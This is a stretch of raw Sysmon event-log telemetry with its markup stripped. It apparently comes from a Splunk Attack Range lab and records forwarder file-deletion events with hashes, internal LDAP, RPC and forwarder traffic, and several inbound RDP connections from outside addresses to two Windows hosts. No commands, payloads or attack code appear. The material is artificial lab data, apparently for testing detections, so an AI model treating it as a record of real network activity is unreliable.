AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53355-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001050062Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:02.076{5EBD8912-7F30-614D-0D00-00000000FC01}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53354-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001050061Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:02.076{5EBD8912-7F40-614D-2B00-00000000FC01}3008C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53354-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 23542300x80000000000000001050068Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:05.503{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=585D2724DCFCADD47632BAD2C496B112,SHA256=1754EA253357474BA6FC36D7B1CFEA73D4C7F21358C79EA4D525CC8921049D51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978660Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:05.089{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E7BB5813A73DB65CD689F82C519E2D3,SHA256=473CAF9DC6A80011FB5B6A710D2F5D956B1CC41042786FB482406FFA23D1F373,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050071Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:06.518{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77737135C34C6975120A299F06BB666B,SHA256=E53D58C72BBBEE433CD4DC24A6DEB53BD7B57E8A660D7D97A1F7F141CE972C44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978661Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:06.089{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D23610916015D2FBC0617720BC092F3,SHA256=B6F92E3218783108AD1FD87AB2CB0B0389646F5128EF1060B5B5E523BA2603E6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050070Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:04.448{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-64005-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050069Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:06.103{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6BDBAF6517AED59793B70BF3E50044C5,SHA256=6874F2812D27E68E0DC3ADA99A71131D46705EA9B0CA4C5378379225A98648B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050072Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:07.534{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76C5D7EF4C30DCB8FE93757AA69B762E,SHA256=34F67006FBBC0CA356C465E891256945EB86E1F236B1557E9BE92B574D953A53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978662Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:07.105{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D98FB60A63423043469A37A059751C2,SHA256=C2CDE9CBC1FC0AF59588AF327E9911E4E4591DDEC4761A9692E9A43025187BB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:08.564{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EF3D83B806771BE02EDDBB06651363C,SHA256=A951404803AB325468FE4492089ED2D559FC13417E72B2F4222FABFA182E6C77,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978664Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:04.686{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59376-false10.0.1.12-8000- 23542300x8000000000000000978663Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:08.230{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05896F0B14589066635621208F333E00,SHA256=C598D9F102706B1EA186BC836C86F1F24224B7CFEA8838082DBEF8E930944409,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050073Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:05.841{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53357-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001050077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:09.600{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5273E5DBE04AC32E862F443CDD887759,SHA256=A2FD42005AA780637B3DD8248DE4CCDEBD241EB27F00C539200D0A00D18909CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978668Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:09.464{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C081ACE7143675AC620DC11724823D12,SHA256=043E7131AA21BD4AC6427D5A2F7BBF4E7CCB0D1BF22CB4D843563B827CC7E874,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:06.684{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56210-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:09.332{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4A88040E5957454EA96E1C830B23EF65,SHA256=9F4A957C55E890B4AF9F94211E770E8595B17641CBAB315D37DEEFF4CBBBF91B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978667Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:06.175{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56614-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978666Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:09.168{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC1D362941271A436CD54257EE7684B9,SHA256=8EDA07EFEC5342E51396E1CC42C422BB094D47E43CF0152788B833ABCD30532A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978665Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:09.168{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D65457528D42C4EF592EE38BD943D9B4,SHA256=52ED9060C0C0F05C1124A2019832E9188CA1492CA52C591E4A536D9CB370DD93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978669Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:10.558{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FBDD94B0DAD2CC5A3FA2FF9074134F9,SHA256=0C8BD7639EDEBD0260107137F8EFF535B2B825F8C9C3EC451622B8711A3010D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:10.636{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06374A93CA2CD63A49203EA947A94A8D,SHA256=5A21363C686B9E09B3F694192C6E5AC878AA5B9C856884CDE73D826A0720741F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:08.076{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-57114-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000978670Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:11.793{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02C3E5173B315DD173DE713C42A5DB9D,SHA256=AE4E65BFAE79994E2B3441C04C1E00B04F9A58D9BA3112D62FB8E8BA7817AE80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:11.639{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=728DB7790BBACEEF276F8647F8093178,SHA256=15E79CB9A2DF35838B172AFC55C16C2C96EE6F783FBD7473DBEED1AA6939A093,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:12.654{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A099EED439B88C3DF47DDA50DB01988,SHA256=F1046E2F83A7C50D899A173B12723C07643E6EF14CA1006D525D30DBD0CD0542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:13.668{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A656DF363DFE05684D829681B1D71F1B,SHA256=72FC14ACB8055C89370189FC67BAF6935D19783B00CCC388E08CA57D8D619C33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978675Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:13.668{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978674Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:13.543{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BC1D362941271A436CD54257EE7684B9,SHA256=8EDA07EFEC5342E51396E1CC42C422BB094D47E43CF0152788B833ABCD30532A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978673Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:10.832{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54834-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978672Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:10.670{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59377-false10.0.1.12-8000- 23542300x8000000000000000978671Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:13.027{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3C2A03860ECDEF68DBA27E29867FF42,SHA256=18B71565C870407D585B29A76164A5CB38A6216F7B69600CE943CF5F0A17E0DA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:11.400{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-59114-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:13.038{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26AD2C95C695DC2D6FB2ECBBF298FEA0,SHA256=6298ABD795AE0DE1E2FB1EE0F1FCFACBAFC3A4D0B56B35D30E2365F2B462D83F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:14.685{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D9239D37222BF72F67825C0FB6480F3,SHA256=EE405D6BA3D462DE7BE89E4420522D9F10E17935225E43DB5CE736719459174D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:11.746{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53358-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000978676Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:14.183{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=124030A114D9CAB389D898874E100017,SHA256=0AA02EB269C8FD5CB275BCC0ACB2BC51F4E51AFFC1610C1AF00197636FCF0A2A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:14.069{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse210.245.92.42-58693-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:15.689{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB4B66E7371F6BE3C2D8F54951650DC7,SHA256=25B663419A641060C9E9DF62D6A27E2684006FC449251FFCC0FAC25594EA6357,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978678Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:12.295{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59378-false10.0.1.12-8089- 23542300x8000000000000000978677Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:15.199{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=802EBAE129CC4FF56B513C243BF74EFC,SHA256=3A9A6657B1E09CF1C2FC5E51E3ED71ACA23DFD7FB0F9228D8A5AADD2D67DF547,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:16.864{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1CF71E6D6A187120B94D138A0B49A114,SHA256=21EEA8413A2EB1F064B2961353B3371A870E837571406E2C0EBC36E19F46B2F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978679Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:16.199{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F4D3741C73F2753756A032D62B23E1E,SHA256=AE070D7242D40AF02DA0AA2F5AAC7A13A7FCFA3340C8413F7C466F4DE9061902,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:17.864{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D326DC22120CE0E56383E073784DE9FA,SHA256=DC8F4F933FAEDEFE8AF0D32E7CCD447277E85B3FED4B18D01CE9A73897E2D5AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978680Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:17.215{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9677CA855D9B6BD6C53E57A08BDBC2DC,SHA256=6102285D2492D789B9B7030FB855BEC073D57AEDF22C850E6AA0341D6CCDAFD8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:16.044{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53359-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 354300x80000000000000001050091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:16.044{5EBD8912-7F40-614D-2700-00000000FC01}2888C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-429.attackrange.local53359-true0:0:0:0:0:0:0:1win-dc-429.attackrange.local389ldap 23542300x80000000000000001050090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:17.364{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=222D63B880C28C1B889E22ADD5130408,SHA256=69930AF1BA3DA9CCFDBDE8CE1C8CA4B2CF62CE99A47CB56F905D8418C91E07F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:18.898{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F59DED86A03436AB1F9CBA2A302143B,SHA256=C49B27A25684BEB6FF6CD53C38004A7126A13B29B01C78D6AD65421A992A890D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978681Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:18.324{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32F889F10164C56B98B536D1562A4005,SHA256=9B81BC3E1D4EB2DD512A11FEC5CFF0CFA5465FCC9581386E48261F557D88F55D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:19.963{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BDB2C82677EC61DA6D7E02814C5287A,SHA256=BB611E7C9EEF7BFAB9E23E9F4A80226E2E851063877045C2A2BCEAD2EE349D65,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978687Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:16.504{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62859-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978686Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:16.190{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62596-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978685Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:15.685{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59379-false10.0.1.12-8000- 23542300x8000000000000000978684Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:11:19.340{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE3EE3F72861D0FA078B8D30102A39FE,SHA256=5C4B31B7D3AA423432B42FDDCFB10C5B1F7A70C5A48F5CD7E3A2B41C9B6AE43F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:11:17.756{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 